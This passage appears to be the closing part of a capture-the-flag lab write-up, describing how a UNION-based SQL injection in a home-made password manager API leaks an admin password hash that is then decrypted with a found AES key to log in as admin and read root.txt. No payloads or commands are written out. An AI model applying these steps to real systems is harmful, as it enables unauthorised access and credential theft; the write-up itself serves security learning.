Skip to main content

Extracting hashes

Why bother to guess or retrieve the master key when we already know the endpoint it is calling?

Moreover, the binary does not seem to decrypt using the masterkey. Instead, it simply displays the content of the response from the API. We should call the endpoint directly!


A seemingly weird AES key is provided to us.

AES key

SQL injection

This seems like the password manager Juliette mentioned about. Pretty basic.

Additionally, it seems to be self-coded and probably prone to vulnerabilities.

Fiddling with the parameters, it is actually vulnerable to SQL Union based injection to leak the admin password hash.


Decrypting using the AES key

From the gathered information, we can decrypt the key

Password hash

Login as admin

With this, we can login as admin and obtain root.txt.